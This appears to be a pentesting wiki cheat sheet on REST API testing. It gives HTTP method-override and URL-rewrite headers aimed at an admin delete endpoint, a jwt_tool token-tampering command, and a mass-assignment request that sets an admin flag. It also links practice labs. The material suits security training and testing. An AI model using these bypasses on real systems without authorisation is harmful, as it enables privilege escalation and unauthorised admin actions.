❎
wiki.hackerlab.cz
  • About me
  • Vulnerability Assessment
  • CLOUD PENTESTING
    • AWS
    • GCP
    • Microsoft Azure
    • Labs
  • REST API - Bypasses and Privilege Escalations
  • Python Virtual Environment (VENV)
  • OSINT & Information Gathering
  • Web Pentesting
    • JavaScript .maps
    • SSRF
    • LDAP Injection
    • Django ORM Exploitation
    • HTTP Request Smuggling
    • Server Side Template Injection (SSTI)
    • Insecure Deserialization
    • Brute force
    • Shell Fu - Oneliners
    • CORS
    • Special Chars & NULL Bytes
    • XSS
    • XXE
    • Nuclei
    • SQL Injection
    • Blind SQL Injection
    • SQLmap
    • NoSQL Injection
    • CRLF Injection
    • Input Validation - Fuzz1
    • HTTP Headers - X-Forwarded
    • Log4j
    • Enumeration with Wordlists
    • Bug Bounty - Web Recon
    • HTTP Proxy Override
    • CSV Injection
    • Windows Forbidden File Names
    • Path Traversal
    • OS Command Injection
    • Open Redirect
    • JWT Tool
    • Burp Extensions - TokenJAR & ATOR
    • Upload RCE
    • GUID and UUIDs
  • Toolset
    • Git - Repo and Tools
    • Docker for Pentesters
  • Infrastructure Pentesting
    • Active Directory (AD)
      • Vulnerable Machines (labs)
      • Pass the hash
      • Azure Active Directory
      • Password Cracking
      • Domain Enumeration
      • LLMNR Poisoning with Responder
      • HTB Forest
      • LDAP
      • WinRM
      • SMB & RPC Enumeration
      • SMB Relay
      • Impacket
      • Bloodhound
      • OWA Exchange Server 2019
      • Active Directory Web Services (ADWS)
      • Active Directory Attacks
    • Mail Server Attacks
    • NFS Enumeration
    • Windows PostExploitation
      • Windows Enumeration
      • Powershell Payloads
      • Add RDP Account & Ride on Meterpreter
    • Dump File Analysis
  • Other Pentest Projects
    • Security Projects
  • WIFI Pentesting
    • Kali Linux - Alpha card AWUS 1900 (VirtualBox)
    • Active Card & Monitor Mode
    • Aircrack-ng Suite
  • Certs
    • Burp Suite Certified Practitioner
  • Linux
    • Network Manager
  • Books
    • The Hacker Playbook 3
Powered by GitBook
On this page
  • Methodology
  • Bypassing API filter and ACL by rewriting HTTP methods an URLs
  • Access Admin Interface
  • JWT Access Token Tampering
  • Mass Assignment
  • API Tester
  • Vulnerable API Project to practice with

Was this helpful?

REST API - Bypasses and Privilege Escalations

REST API security testing

PreviousLabsNextPython Virtual Environment (VENV)

Last updated 25 days ago

Was this helpful?

Methodology

Bypassing API filter and ACL by rewriting HTTP methods an URLs

X-HTTP-Method: PATCH
X-HTTP-Method-Override: PATCH
X-Http-Method-Override: PATCH
X-HTTP-Method-Override: PATCH
X-Http-Method: PATCH
X-HTTP-Method: PATCH
X-Method-Override: PATCH
X-Original-Method: PATCH
X-Original-URL: /admin/deleteUser
X-Rewrite-URL: /admin/deleteUser

Access Admin Interface

JWT Access Token Tampering

JWT Editor : Burp plugin

JWT Tool

python3 ./jwt_tool.py -M pb -t http:/URL:5001/api/method  -pd "{\"propertyId\": 29}" -rh "Authorization: Bearer <TOKEN>" -rh "Content-Type: text/json"

Mass Assignment

Observer object properties and try to set them (search for hidden parameters PARAMMINER)

POST /api/user/create
Host: server
Content-Type: application/json

{ "admin": true}

API Tester

Vulnerable API Project to practice with

using HTTP headers rewriting .

Available in BApp store, explore also advanced JWT header attacks

trusted client's IP address or Hosts
https://portswigger.net/web-security/jwt#jwt-header-parameter-injections
https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology
API testing | Web Security AcademyWebSecAcademy
Logo
PortSwigger-Academy-CheatSheets/API Testing at master · ChrisM-X/PortSwigger-Academy-CheatSheetsGitHub
GitHub - PortSwigger/jwt-editor: A Burp Suite extension and standalone application for creating and editing JSON Web Tokens. This tool supports signing and verification of JWS, encryption and decryption of JWE and automation of several well-known attacks against applications that consume JWT.GitHub
GitHub - OWASP/OFFAT at mainGitHub
Logo
Logo
Logo
GitHub - theowni/Damn-Vulnerable-RESTaurant-API-Game: Damn Vulnerable Restaurant is an intentionally vulnerable Web API game for learning and training purposes dedicated to developers, ethical hackers and security engineers.GitHub
Logo